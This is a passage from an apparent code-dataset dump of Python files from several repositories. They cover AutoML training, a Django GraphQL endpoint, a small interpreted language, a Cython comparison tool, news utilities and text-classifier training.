X_train, X_test, y_train, y_test = train_test_split(data, marks, shuffle=True, test_size=0.2)
import autosklearn.classification
import autosklearn.metrics
from get_config import config
import time
automl = autosklearn.classification.AutoSklearnClassifier(metric=autosklearn.metrics.mean_absolute_error, logging_config=config)
print("start", time.time())
automl.fit(X_train, y_train)
print(time.time())
def p():
print(automl.cv_results_)
print(automl)
print({name: getattr(automl, name) for name in dir(automl)})
p()
# parameters = {
# # LGBMRegressor(min_child_samples=1, min_child_weight=1.0, n_estimators=1000,
# # num_leaves=50, random_state=42, reg_alpha=1.0, reg_lambda=1.0))
# 'boosting_type': ('gbdt', 'dart', 'goss', 'rf',),
# 'num_leaves': [2, 15, 31],
# "n_estimators": np.linspace(1, 1000, 4, dtype=int),
# # "min_split_gain": np.linspace(0, 1, 4),
# # "min_child_weight": [1e-3, 1.],
# # "min_child_samples": [1, 30],
# "reg_alpha": np.linspace(0, 1, 4),
# "reg_lambda": np.linspace(0, 1, 4),
# }
# parameters = {
# 'boosting_type': ('gbdt', 'dart', 'goss', 'rf',),
# 'num_leaves': [1, 50],
# "n_estimators": [1, 1000],
# "min_split_gain": [0., 1.],
# "min_child_weight": [1e-3, 1.],
# "min_child_samples": [1, 30],
# "reg_alpha": [0., 1.],
# "reg_lambda": [0., 1.],
# }
# clf = GridSearchCV(lightgbm.LGBMRegressor(random_state=42), parameters, verbose=3, cv=2, scoring='neg_mean_absolute_error') # n_jobs=10,
# clf.fit(X_train, y_train)
# print(clf.cv_results_)
# print(clf.best_estimator_)
from sklearn.metrics import mean_absolute_error, r2_score
pred_mark = automl.predict(X_test)
print(mean_absolute_error(y_test, pred_mark))
print(r2_score(y_test, pred_mark))
print("gg", time.time())
automl.fit(data, marks)
print(time.time())
p()
y_pred = pd.read_csv("sample_submission.csv", index_col=0)
y_pred["mark"] = automl.predict(X_validation)
y_pred.to_csv("baseline_submission.csv")
#ya tyt bil
#I was here
``` |
{
"source": "0dminnimda/NTO_fintech_2022_final",
"score": 2
} |
#### File: backend/sugomA/urls.py
```python
import json
from typing import cast
from ariadne.constants import DATA_TYPE_JSON, DATA_TYPE_MULTIPART
from ariadne.exceptions import HttpBadRequestError
from ariadne.file_uploads import combine_multipart_data
from ariadne.graphql import graphql_sync
from django.conf import settings
from django.contrib import admin
from django.http import HttpRequest, HttpResponseBadRequest, JsonResponse
from django.shortcuts import render
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from graphql import GraphQLSchema
from .exceptions import error_formatter
from .AmogusApp.views import check, home
from .schema import code_smell, schema
def extract_data_from_request(request: HttpRequest):
content_type = request.content_type or ""
content_type = content_type.split(";")[0]
if content_type == DATA_TYPE_JSON:
try:
return json.loads(request.body)
except (TypeError, ValueError) as ex:
raise HttpBadRequestError(
"Request body is not a valid JSON") from ex
if content_type == DATA_TYPE_MULTIPART:
try:
operations = json.loads(request.POST.get("operations", "{}"))
except (TypeError, ValueError) as ex:
raise HttpBadRequestError(
"Request 'operations' multipart field is not a valid JSON") from ex
try:
files_map = json.loads(request.POST.get("map", "{}"))
except (TypeError, ValueError) as ex:
raise HttpBadRequestError(
"Request 'map' multipart field is not a valid JSON") from ex
return combine_multipart_data(operations, files_map, request.FILES)
raise HttpBadRequestError(
"Posted content must be of type {} or {}".format(
DATA_TYPE_JSON, DATA_TYPE_MULTIPART))
def get_context_for_request(context_value, request: HttpRequest):
if callable(context_value):
return context_value(request)
return context_value or {"request": request}
def get_extensions_for_request(extensions, request: HttpRequest, context):
if callable(extensions):
return extensions(request, context)
return extensions
def get_kwargs_graphql(request: HttpRequest) -> dict:
context_value = get_context_for_request(None, request)
extensions = get_extensions_for_request(None, request, context_value)
# http_method_names = ["get", "post", "options"]
# template_name = "ariadne_django/graphql_playground.html"
# playground_options: Optional[dict] = None
# schema: Optional[GraphQLSchema] = None
return {
"context_value": context_value,
"root_value": None,
"validation_rules": None,
"debug": settings.DEBUG,
"introspection": True,
"logger": None,
"error_formatter": error_formatter,
"extensions": extensions,
"middleware": None,
}
@csrf_exempt
def graphql_view(request: HttpRequest):
if request.method == "GET":
return render(request, "home.html")
try:
data = extract_data_from_request(request)
except HttpBadRequestError as error:
return HttpResponseBadRequest(error.message)
print("\n" + "#"*5, "request", data)
code_smell.storage = request.COOKIES
success, result = graphql_sync(
cast(GraphQLSchema, schema), data, **get_kwargs_graphql(request))
status_code = 200 if success else 400
if code_smell["requested_auth"] > 0:
code_smell["requested_auth"] -= 1
response = JsonResponse(result, status=status_code)
print("#"*5, "response", result)
for n, v in code_smell.storage.items():
response.set_cookie(n, v)
return response
@csrf_exempt
def rooms_view(request: HttpRequest):
return render(request, "rooms.html")
@csrf_exempt
def rooms_create_view(request: HttpRequest):
return render(request, "rooms_create.html")
@csrf_exempt
def room_view(request: HttpRequest, room_id):
print('ROOM:', room_id)
return render(request, "room.html")
urlpatterns = [
path("", csrf_exempt(home)),
path("admin/", admin.site.urls),
path('graphql', graphql_view, name='graphql'),
path('rooms', rooms_view),
path('rooms/create', rooms_create_view),
path('room/<int:room_id>', room_view),
path("check", csrf_exempt(check)),
]
``` |
{
"source": "0dminnimda/PyBEX",
"score": 3
} |
#### File: PyBEX/pybex/classes.py
```python
from dataclasses import dataclass, field
from functools import partial
from typing import Callable, Dict, List, Optional, Type, TypeVar, Union
# Interpretation
@dataclass
class Scope:
namespace: Dict[str, "Expr"] = field(
default_factory=dict)
def update_by_scope(self, scope: "Scope") -> None:
self.namespace.update(scope.namespace)
@classmethod
def from_funcions(cls, *funcions: "Function"):
return cls({
func.name: func
for func in funcions
})
class EvalContext:
scopes: List[Scope]
last_funcall: Optional["Funcall"]
def __init__(self, scope: Optional[Scope] = None):
if scope is None:
scope = Scope()
self.scopes = [scope]
self.last_funcall = None
@property
def scope(self) -> Scope:
return self.scopes[-1]
def add_scope(self, scope: Scope) -> None:
self.scopes.append(scope)
def add_new_scope(self) -> None:
self.add_scope(Scope())
def pop_scope(self) -> None:
if len(self.scopes) == 0:
raise RuntimeError("Cannot removethe only one last scope, "
"there always should be at least one left")
del self.scopes[-1]
# AST
class Expr:
pass
@dataclass
class Program:
body: List[Expr]
@dataclass
class Number(Expr):
value: Union[int, float]
def __repr__(self):
return repr(self.value)
def __str__(self):
return str(self.value)
@dataclass
class String(Expr):
value: str
def __repr__(self):
return repr(self.value)
def __str__(self):
return self.value
@dataclass
class Word(Expr):
value: str
@dataclass
class Funcall(Expr):
name: str
args: List[Expr]
PyFunctionT = Callable[[EvalContext, List[Expr]], Expr]
FuncT = TypeVar("FuncT", bound="Function")
@dataclass
class Function(Expr):
name: str
_func: PyFunctionT
@classmethod
def named_py(cls: Type[FuncT],
name: str) -> Callable[[PyFunctionT], FuncT]:
return partial(cls, name)
@classmethod
def py(cls: Type[FuncT], func: PyFunctionT) -> FuncT:
return cls(func.__name__[4:], func)
# too dynamic for type checkers:
# @classmethod
# def py(
# cls: Type[FuncT], arg1: Union[PyFunctionT, str]
# ) -> Union[FuncT, Callable[[PyFunctionT], FuncT]]:
# if isinstance(arg1, str):
# return partial(cls, arg1)
# return cls(arg1.__name__, arg1)
def __call__(self, ctx: EvalContext, exprs: List[Expr]) -> Expr:
return self._func(ctx, exprs)
def __repr__(self):
return f"Function(name={self.name!r})"
# AST/code Constants
class NothingType(Expr):
def __repr__(self):
return "Nothing"
Nothing = NothingType()
class UnfinishedType(Expr):
pass
Unfinished = UnfinishedType()
```
#### File: PyBEX/pybex/parser.py
```python
import ast
from dataclasses import dataclass
from lark import Lark, Transformer
from .classes import Funcall, Number, Program, String, Unfinished, Word
@dataclass
class BEXTransformer(Transformer):
interactive: bool
def int(self, items):
return Number(int(items[0].value))
def float(self, items):
return Number(float(items[0].value))
def string(self, items):
return String(ast.literal_eval(items[0].value))
def unfinished_string(self, items):
if self.interactive:
return Unfinished
# TODO: pretty parsing errors
raise SyntaxError("unterminated triple-quoted string literal")
def word(self, items):
return Word(items[0].value)
def funcall(self, items):
return Funcall(items[0].value, items[1:])
def unfinished_call(self, items):
if self.interactive:
return Unfinished
# TODO: pretty parsing errors
raise SyntaxError("unexpected EOF while parsing")
def exec_input(self, items):
return Program(items)
def single_input(self, items):
return Program(items)
_transformer = BEXTransformer(False)
_parser = Lark.open(
"grammar.lark", parser="lalr", transformer=_transformer,
start=["single_input", "exec_input"], rel_to=__file__,
# priority="invert"
# debug=True,
# propagate_positions=True,
)
# with open(os.path.join(os.path.dirname(__file__), )) as f:
# PARSER = Lark(f)
# del f
def parse_source(source: str, mode: str = "exec") -> Program:
if mode == "exec":
_transformer.interactive = False
start = "exec_input"
# method = _parser.parse
# elif mode == "eval":
# _transformer.interactive = False
# start = "expr"
elif mode == "single":
_transformer.interactive = True
start = "single_input"
# method = _parser.parse_interactive
else:
raise ValueError("`mode` must be 'exec'"
# ", 'eval'"
" or 'single'")
return _parser.parse(source, start=start) # type: ignore
# def parse_file(path: str, mode: str = "exec") -> Program:
# with open(path) as f:
# return parse_source(f.read(), mode)
``` |
{
"source": "0dminnimda/translation_comparator",
"score": 2
} |
#### File: examples/cython/array.py
```python
import cython
def test():
p: cython.int[1000] = [0] * 1000
p[0] = 100
```
#### File: translation_comparator/cython/annotated_html_parser.py
```python
import re
from pathlib import Path
from typing import List, Tuple
from bs4 import BeautifulSoup, FeatureNotFound
from bs4.element import Tag
def get_code_from_soup(soup: BeautifulSoup) -> List[str]:
return [
tag.text for tag in soup.find_all("pre", class_="code")]
def get_soup_from_html(path: Path) -> BeautifulSoup:
html = path.with_suffix(".html").read_text()
html = html.replace(path.stem, "{fname}")
html = html.replace(path.stem[:-1], "{fname}")
html = re.sub(r"\d+{fname}", "{num_fname}", html)
html = html.replace("{fname}" + "_" + path.suffix[1:],
"{fname_suf}")
try:
return BeautifulSoup(html, "lxml")
except FeatureNotFound:
try:
return BeautifulSoup(html, "html5lib")
except FeatureNotFound:
return BeautifulSoup(html, "html.parser")
def get_code_from_two_files_by_path(
path1: Path, path2: Path
) -> Tuple[List[str], List[str]]:
return (
get_code_from_soup(get_soup_from_html(path1)),
get_code_from_soup(get_soup_from_html(path2)))
def get_code_from_two_files(
file1: str, file2: str
) -> Tuple[List[str], List[str]]:
return get_code_from_two_files_by_path(
Path(file1), Path(file2))
```
#### File: translation_comparator/cython/with_cython.py
```python
from pathlib import Path
from typing import Iterable
from Cython.Build import cythonize
from ..comparison_helpers import compare_cythonized
from ..pair_finders import pairs_and_extentions_for_cython
from . import settings
def cythonize_paths(paths: Iterable[Path], **kwargs) -> None:
if "module_list" in kwargs:
raise ValueError("module_list should not be present")
kwargs.update(build_dir=str(settings.build_dir), annotate=True)
cythonize(list(map(str, paths)), **kwargs)
def cythonize_and_compare(*patterns: str, **kwargs):
pairs, py_paths, pyx_paths = pairs_and_extentions_for_cython(*patterns)
build_dir = settings.build_dir
settings.build_dir = build_dir.joinpath(settings.py_dir) # dirty singleton
cythonize_paths(py_paths, **kwargs)
settings.build_dir = build_dir.joinpath(settings.pyx_dir)
cythonize_paths(pyx_paths, **kwargs)
settings.build_dir = build_dir
compare_cythonized(pairs)
```
#### File: translation_comparator/translation_comparator/pair_finders.py
```python
from distutils.extension import Extension
from pathlib import Path
from typing import Collection, Iterable, Iterator, List, Optional, Set, Tuple
from .cython import settings as cython_settings
from .path_helpers import full_path, relative_to_cwd, self_glob, with_parent
from .typedefs import GEN_PATH_FUNC
def includes_excludes_from_patterns(
*patterns: str
) -> Tuple[List[Path], List[Path]]:
includes, excludes = [], []
for pattern in patterns:
if pattern[:2] == "\\!":
excludes.append(full_path(
Path(pattern[2:])))
else:
includes.append(full_path(
Path(pattern)))
return includes, excludes
def no_matches(path: Path, patterns: Collection[Path]) -> bool:
for pattern in patterns:
if path.match(str(pattern)):
return False
return True
def matching_paths(
includes: Iterable[Path], excludes: Collection[Path],
) -> Iterator[Path]:
for path in includes:
for match in self_glob(path):
if no_matches(match, excludes):
yield match
def paths_for_cython(*patterns: str) -> Iterator[Path]:
# if returned is None:
returned: Set[str] = set()
includes, excludes = includes_excludes_from_patterns(*patterns)
extensions = cython_settings.extensions
for path in matching_paths(includes, excludes):
if path.suffix in extensions and path.name not in returned:
yield path
returned.add(path.name)
def pairs_and_extentions_for_cython(
*patterns: str
) -> Tuple[List[Tuple[Path, Path]], List[Path], List[Path]]:
pairs: List[Tuple[Path, Path]] = []
py_paths: List[Path] = []
pyx_paths: List[Path] = []
path_func = cython_settings.path_func
build_dir = cython_settings.build_dir
for path in paths_for_cython(*patterns):
path1, path2 = path_func(path)
path1 = relative_to_cwd(path1)
path2 = relative_to_cwd(path2)
new_path1 = with_parent(path1, cython_settings.py_dir)
new_path2 = with_parent(path2, cython_settings.pyx_dir)
py_paths.append(path1)
pyx_paths.append(path2)
pairs.append((
cython_settings.build_dir.joinpath(new_path1),
cython_settings.build_dir.joinpath(new_path2)))
return pairs, py_paths, pyx_paths
```
#### File: translation_comparator/translation_comparator/path_helpers.py
```python
from glob import iglob
from pathlib import Path
from typing import Iterator, Tuple
from .cython import settings as cython_settings
def self_glob(path: Path) -> Iterator[Path]:
for string in iglob(str(path)):
yield Path(string)
def full_path(path: Path) -> Path:
return path.expanduser().absolute()
def relative_to_cwd(path: Path) -> Path:
return path.relative_to(Path.cwd())
def with_parent(path: Path, directory: Path) -> Path:
return directory.joinpath(path.name)
def change_same_paths_if_needed(path1: Path, path2: Path) -> Tuple[Path, Path]:
if path1.stem == path2.stem:
return (cython_settings.unique_stem_func(path1),
cython_settings.unique_stem_func(path2))
if path1.name == path2.name:
return cython_settings.unique_name_func(path1)
return (path1, path2)
``` |
{
"source": "0dysseas/news-indicator",
"score": 3
} |
#### File: news-indicator/newsindicator/utils.py
```python
import json
import os
def print_json_object(obj):
"""
A JSON print helper function.
"""
print ('Printing JSON object')
print (json.dumps(obj, indent=4))
def get_asset(asset='sources'):
"""
Gets the assets from the specified folder.
"""
absolute_path = os.path.dirname(os.path.abspath(__file__))
if asset is not 'sources':
return os.path.join(absolute_path, 'assets/news_icon.png')
return os.path.join(absolute_path, 'assets/news_sources.txt')
def get_news_sources_from_file():
"""
Gets the news sources from the file.
"""
source_file = get_asset()
with open(source_file, 'r') as f:
news_sources = dict()
for line in f:
if not line.startswith('#') and line.split():
split_line = line.split(' = ')
news_sources[split_line[0]] = split_line[1].rstrip('\n')
return news_sources
def delete_redundant_items(json_news, keys_to_del):
#deletes redundant items
for item in keys_to_del:
del json_news[item]
return json_news
``` |
{
"source": "0dysseas/news",
"score": 2
} |
#### File: news_backend/core/models.py
```python
from django.db import models
class Article(models.Model):
title = models.TextField(blank=False, default='Enter the article title here...')
subHeader = models.TextField(blank=True)
journalistName = models.TextField(blank=True)
content = models.TextField(blank=False, default='Enter the article content here...')
topic = models.TextField(blank=False, default='Enter the article topic here...')
timeOfPublish = models.DateField(blank=False, null=True)
# tags = ArrayField(models.CharField(max_length=250), blank=True, null=True)
# TODO: Add image field
def __str__(self):
return '{article} by {journalist} written on {date}'.format(article=self.title,
journalist=self.journalistName,
date=self.timeOfPublish)
```
#### File: core/tests/test_views.py
```python
from ..models import Article
from ..serializers import ArticleSerializer
from rest_framework import status
from django.test import TestCase
from rest_framework.test import APIClient
client = APIClient()
class GetAllArticlesTest(TestCase):
"""
Test class for GET /articles
"""
def setUp(self):
Article.objects.create(id=1, content='The US impeachment inquiry emerges from behind closed doors at last.'
'more than a month, the process - which could end in a Senate vote on '
'Donald Trump\'s removal from office - has been shrouded in mystery.The '
'biggest revelations have come from leaks, anonymous media reports and '
'voluminous deposition transcripts where even the most explosive and '
'revealing moments can be drained of drama when presented on the written'
'page. That all changes on Wednesday. Here are four things to keep in '
'mind as the lights go up and the cameras turn on in the House '
'Intelligence Committee hearing room.',
journalistName='<NAME>', timeOfPublish='2019-11-13',
subHeader='The US impeachment inquiry emerges from behind closed doors at last.For more '
'than a month, the process - which could end in a Senate vote on Donald '
'Trump\'s removal from office - has been shrouded in mystery.',
title='Trump impeachment inquiry', topic='World News')
Article.objects.create(id=2, content='The recent flooding in Venice was caused by a combination of high spring '
'tides and a meteorological storm surge driven by strong sirocco winds '
'blowing north-eastwards across the Adriatic Sea. '
'When these two events'
'coincide, we get what is known as Acqua Alta (high water).This latest '
'Acqua Alta occurrence in Venice is the second highest tide in recorded '
'history. However, if we look at the top 10 tides, five have occurred in '
'the past 20 years and the most recent was only last year. While we should'
'try to avoid attributing a single event to climate change, the increased '
'frequency of these exceptional tides is obviously a big concern. In our '
'changing climate, sea levels are rising and a city such as Venice, which '
'is also sinking, is particularly susceptible to such changes. The weather'
'patterns that have caused the Adriatic storm surge have been driven by a '
'strong meridional (waving) jet stream across the northern hemisphere and '
'this has fed a conveyor belt of low pressure systems into the central '
'Mediterranean.One of the possible effects of a changing climate is that '
'the jet stream will be more frequently meridional and blocked weather '
'patterns such as these will also become more frequent. If this happens, '
'there is a greater likelihood that these events will combine with '
'astronomical spring tides and hence increase the chance of flooding in '
'Venice. Furthermore, the meridional jet stream can be linked back to '
'stronger typhoons in the north-west Pacific resulting in more frequent '
'cold outbreaks in North America and an unsettled Mediterranean is another'
'one of the downstream effects.', journalistName='<NAME>',
timeOfPublish='2019-11-12', subHeader='The recent flooding in Venice was caused by a '
'combination of high spring tides and a '
'meteorological storm surge driven by strong '
'sirocco winds blowing north-eastwards across the '
'Adriatic Sea.', title='Is climate change behind '
'Venice Flooding?',
topic='Top News, World News')
Article.objects.create(id=3, content='Fuelled by rising international interest in why the Nordic countries are '
'doing so well, three of the region’s top universities recently joined '
'forces to launch the world’s first international master’s programme '
'specialising in Nordic urban planning. Taught in English, it is a '
'collaboration between Pinder’s team at Roskilde University, west of '
'Copenhagen, researchers at Malmö University in southern Sweden and The '
'Arctic University of Norway in Tromsø, 200 miles north of the Arctic '
'circle. The first 32 students began the course in September and will each '
'spend at least one semester in every location during the two-year '
'programme.\“I have been travelling around the Nordics and I was very '
'impressed by the green spaces, architecture which combines aesthetics and'
' utility, and mobility in urban spaces,\” says <NAME>, 32, an '
'urban planner from Paris. He signed up to get a \“fresh gaze\” on his '
'profession, but the multidisciplinary course has also attracted '
'participants from Europe and North America with a diverse range of '
'backgrounds, as well as graduates in urban planning or people who have '
'spent time working in the sector. In the Nordics, a strong rail '
'infrastructure connects most major cities, long-distance trains and buses '
'are typically equipped with WiFi, and commuters can usually avoid driving '
'to work \“There are so many places that can learn from Nordic perspectives'
' on planning,” argues <NAME>, a 27-year-old Danish student'
' taking the course. “I recently went to the US and travelled around the '
'southern part. In Nashville, it was almost impossible getting around '
'without a car and it was even difficult travelling between cities. Going '
'on a bus [in the US], it was clear that it was mostly people from a '
'specific socioeconomic background who took the bus.\” In the Nordics, a '
'strong rail infrastructure connects most major cities, long-distance '
'trains and buses are typically equipped with WiFi, and commuters can '
'usually avoid driving to work. Of course, Nordic countries are much '
'smaller than North America and have fewer large urban hubs, which means a'
' direct comparison is difficult. Yet Mikkelsen says the experience made '
'her keenly aware of the benefits of investing in public transport. \“I '
'realised it is very clear how quickly you accommodate yourself to living '
'in a liveable city. I am so used to being able to walk or cycle '
'everywhere,\” she reflects.',
journalistName='<NAME>', timeOfPublish='2019-11-12',
subHeader='Scandinavia is famous for its liveable cities, but a new university course '
'in Nordic urban planning has raised questions about replicating the region’s '
'approach elsewhere.',
title='What the Nordic nations can teach us about liveable cities', topic='World News')
Article.objects.create(id=4, content='A national culture that supports spending time alone as well as with '
'friends is also something he values, alongside Finland’s ample nature and'
' low unemployment levels. “There’s a lot of jobs...if one is ready to '
'apply and search for a job, then I think everyone can get a job,” '
'he argues.', journalistName='<NAME>',
timeOfPublish='2019-11-13', subHeader='Finland regularly tops global rankings as the '
'happiest nation on the planet, but this brings a '
'unique set of challenges for young people '
'struggling with depression.',
title='Being depressed in the \'world\'s happiest country\'',
topic='Top News, World News')
def test_get_all_articles(self):
# get API response
response = client.get('http://192.168.1.3:8000/api/v1/articles/')
# get data from db
articles = Article.objects.all()
serializer = ArticleSerializer(articles, many=True)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
``` |
{
"source": "0e4e6d01/non-parallel-text-style-transfer-using-self-attn-discriminator",
"score": 3
} |
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/classifier/classifier_args.py
```python
import argparse
def add_classifier_arguments(parser):
parser.add_argument(
"--num_labels",
type=int,
default=2,
help="number of classes of labels"
)
def add_cnn_classifier_arguments(parser):
parser.add_argument(
"--num_kernels_each_size",
type=int,
default=2,
help="number of kernels of each size"
)
parser.add_argument(
"--kernel_sizes",
type=int,
default=[2, 3, 4],
nargs='+',
help="a list of kernel sizes"
)
def add_rnn_classifier_arguments(parser):
parser.add_argument(
"--enc_num_layers",
type=int,
default=1,
help="number of layer of encoder rnn"
)
parser.add_argument(
"--hidden_size",
type=int,
default=256,
help="hidden size of rnn encoder"
)
parser.add_argument(
"--cell",
type=str,
default="LSTM",
help="lstm or gru"
)
parser.add_argument(
"--enc_bidirectional",
action="store_true",
help="whether encoder is bi-directional"
)
```
#### File: non-parallel-text-style-transfer-using-self-attn-discriminator/classifier/trainers.py
```python
import os
import time
import csv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data.dataloader import DataLoader
from torch.nn.utils import clip_grad_norm_ as clip_grad_norm
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from utils import tokenization, optimization, constants, misc
from utils.data import *
def get_classification_data(data_dir, data_name):
"""
args:
data_dir: str
data_name: str
return:
data: dict of {"src_str": list of str, "lab": list of int}
"""
src_0, src_1 = [], []
with open(os.path.join(data_dir, data_name+".0"), 'r') as f:
for line in f.readlines():
src_0.append(line.strip())
with open(os.path.join(data_dir, data_name+".1"), 'r') as f:
for line in f.readlines():
src_1.append(line.strip())
lab_0 = [0] * len(src_0)
lab_1 = [1] * len(src_1)
src = src_0 + src_1
lab = lab_0 + lab_1
data = {"src_str": src, "lab": lab}
print("%s data has been loaded" % data_name)
for l, count in enumerate(np.bincount(data["lab"])):
print("number of label %d: %d" % (l, count))
return data
def load_and_cache_data(args, data_name, tokenizer):
"""
return:
data: dict of {"src_str": list of str,
"src_ind": list of int,
"lab": list of int}
"""
sos_str = "_sos" if args.use_sos else ""
eos_str = "_eos" if args.use_eos else ""
mask_str = "_mask" if "mask" in args.vocab_file_name else ""
cached_data_file = os.path.join(
args.data_dir,
f"cached_cls_{data_name}{sos_str}{eos_str}{mask_str}"
)
if os.path.exists(cached_data_file) and not args.overwrite_cache:
print("Loading data from cached data file %s" % cached_data_file)
data = torch.load(cached_data_file)
else:
print("Creating cached data file from data at %s" % cached_data_file)
data = get_classification_data(args.data_dir, data_name)
index_src = []
str_src = []
sos_id, eos_id = tokenizer.SOS_ID, tokenizer.EOS_ID
sos_token, eos_token = tokenizer.SOS_TOKEN, tokenizer.EOS_TOKEN
if args.use_sos and args.use_eos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([sos_token, text, eos_token]))
elif args.use_sos:
for text in data['src_str']:
index_src.append([sos_id] + tokenizer.encode(text))
str_src.append(' '.join([sos_token, text]))
elif args.use_eos:
for text in data['src_str']:
index_src.append(tokenizer.encode(text) + [eos_id])
str_src.append(' '.join([text, eos_token]))
else:
for text in data['src_str']:
index_src.append(tokenizer.encode(text))
str_src.append(text)
data['src_ind'] = index_src
data['src_str'] = str_src
torch.save(data, cached_data_file)
return data
class BasicTrainer:
"""
Basic Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None):
self.args = args
self.model = model
self.optimizer = None
self.scheduler = None
self.train_dataloader = self.get_dataloader(train_data)\
if train_data else None
self.dev_dataloader = self.get_dataloader(dev_data)\
if dev_data else None
self.test_dataloader = self.get_dataloader(test_data)\
if test_data else None
if self.train_dataloader:
self.optimizer, self.scheduler = self.get_optimizer()
def get_dataloader(self, data):
args = self.args
if args.mode == "train":
shuffle = args.shuffle
else:
shuffle = False
dataset = ClassifierDataset(data["src_ind"], data["lab"])
dataloader = DataLoader(dataset=dataset,
batch_size=args.batch_size,
shuffle=shuffle,
num_workers=args.num_workers,
collate_fn=ClassifierPaddingCollate)
return dataloader
def get_optimizer(self, params=None):
args = self.args
if params is None:
params = self.model.parameters()
train_dataloader = self.train_dataloader
optimizer = optimization.get_optim(args, params)
num_steps = len(train_dataloader) * args.num_train_epochs
print("Total number of steps: %d" % num_steps)
decay_step = len(train_dataloader) * args.decay_epoch
if args.decay_epoch > 0:
print("Step when lr starts to decay: %d" % decay_step)
scheduler = optimization.get_constant_schedule_with_linear_decay(
optimizer, decay_step=decay_step, num_training_steps=num_steps
)
else:
scheduler = optimization.get_constant_schedule(optimizer)
return optimizer, scheduler
def save_checkpoint(self, path):
# torch.save(self.args, os.path.join(path, "args.pt"))
torch.save(self.model.state_dict(), os.path.join(path, "model_state_dict.pt"))
# torch.save(self.optimizer.state_dict(), os.path.join(path, "optimizer_state_dict.pt"))
# torch.save(self.scheduler.state_dict(), os.path.join(path, "scheduler_state_dict.pt"))
def train(self, train_dataloader=None):
print("\n### TRAINING BEGINS ###")
args = self.args
model = self.model
optimizer = self.optimizer
scheduler = self.scheduler
train_dataloader = train_dataloader if train_dataloader else self.train_dataloader
model.train()
loss_record = [] # loss at global_step 0, 1, 2 ...
acc_record = []
global_step_record_for_eval = []
global_step = -1
model.zero_grad()
start_time = time.time()
for ep in range(args.num_train_epochs):
for step, batch in enumerate(train_dataloader):
global_step += 1
src, lab, src_len = batch
src, lab = src.to(args.device), lab.to(args.device)
try:
outputs = model(src)
loss = F.cross_entropy(outputs, lab, reduction='mean')
loss.backward()
g = clip_grad_norm(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step()
model.zero_grad()
loss_record.append(loss.item())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
if global_step > 0 and global_step % args.log_interval == 0:
print(
f"epoch: {ep} "\
f"step: {global_step} "\
f"loss: {loss.item():.4f} "\
f"||g||: {g:.2f} "\
f"time: {misc.timeBetween(start_time, time.time())}"
)
if global_step > 0 and global_step % args.eval_interval == 0:
print("\neval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
model.train()
print("### TRAINING ENDS ###\n")
print("eval model at step: %d" % global_step)
acc = self.evaluate()
acc_record.append(acc)
global_step_record_for_eval.append(global_step)
checkpoint_output_dir = os.path.join(args.output_dir, "checkpoint-%d" % global_step)
if not os.path.exists(checkpoint_output_dir):
os.mkdir(checkpoint_output_dir)
print("Save checkpoint at %s" % checkpoint_output_dir)
self.save_checkpoint(checkpoint_output_dir)
train_record = loss_record
eval_record = (acc_record, global_step_record_for_eval)
best_acc = self.save_train_result(train_record, eval_record)
return best_acc, train_record, eval_record
def evaluate(self, eval_dataloader=None):
eval_dataloader = eval_dataloader if eval_dataloader else self.dev_dataloader
args = self.args
model = self.model
model.eval()
total_loss = 0
total_preds, total_labs = [], []
start_time = time.time()
with torch.no_grad():
for step, batch in enumerate(eval_dataloader):
src, lab, src_len = batch
total_labs.extend(lab.numpy().tolist())
src, lab = src.to(args.device), lab.to(args.device)
try:
outputs = model(src)
total_loss += F.cross_entropy(outputs, lab, reduction='sum').item()
total_preds.extend(torch.argmax(outputs, dim=1).cpu().numpy().tolist())
except RuntimeError as e:
if 'out of memory' in str(e):
print('|| WARNING: ran out of memory ||\n')
if hasattr(torch.cuda, 'empty_cache'):
torch.cuda.empty_cache()
else:
print('|| WARNING: fail to train ||\n')
raise e
acc = accuracy_score(total_labs, total_preds)
print("==============================")
print(
"acc: {:.4f} loss: {:.4f} time: {}".format(
acc, total_loss/len(total_labs), misc.timeBetween(start_time, time.time())
)
)
print("==============================\n")
return acc
def test(self, test_dataloader=None, save_res=None):
test_dataloader = test_dataloader if test_dataloader else self.test_dataloader
return self.evaluate(test_dataloader)
def save_train_result(self, train_record, dev_record):
args = self.args
loss_record = train_record
acc_record, gs_record = dev_record
best_acc = np.max(acc_record)
step_of_best_acc = gs_record[np.argmax(acc_record)]
print("best acc: %.4f in step %d" % (best_acc, step_of_best_acc))
with open(os.path.join(args.output_dir, "training_result.log"), 'w') as f:
f.write("best acc: %.4f at step %d\n" % (best_acc, step_of_best_acc))
plt.figure()
plt.xlabel("step")
plt.ylabel("acc")
plt.plot(gs_record, acc_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "acc.pdf"), format='pdf') # bbox_inches='tight'
plt.figure()
plt.xlabel("step")
plt.ylabel("loss")
plt.plot(list(range(len(loss_record))), loss_record)
plt.tight_layout()
plt.savefig(os.path.join(args.output_dir, "loss.pdf"), format='pdf')
return best_acc
class CNNClassifierTrainer(BasicTrainer):
"""
CNN Classifier Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs):
super(CNNClassifierTrainer, self).__init__(
args, model, train_data, dev_data, test_data
)
class SelfAttnRNNClassifierTrainer(BasicTrainer):
"""
Self-Attention RNN Classifier Trainer
"""
def __init__(self, args, model, train_data=None, dev_data=None, test_data=None, **kwargs):
super(SelfAttnRNNClassifierTrainer, self).__init__(
args, model, train_data, dev_data, test_data
)
self.tokenizer = kwargs["tokenizer"]
self.train_data = train_data
self.dev_data = dev_data
self.test_data = test_data
if "mask" in args.vocab_file_name:
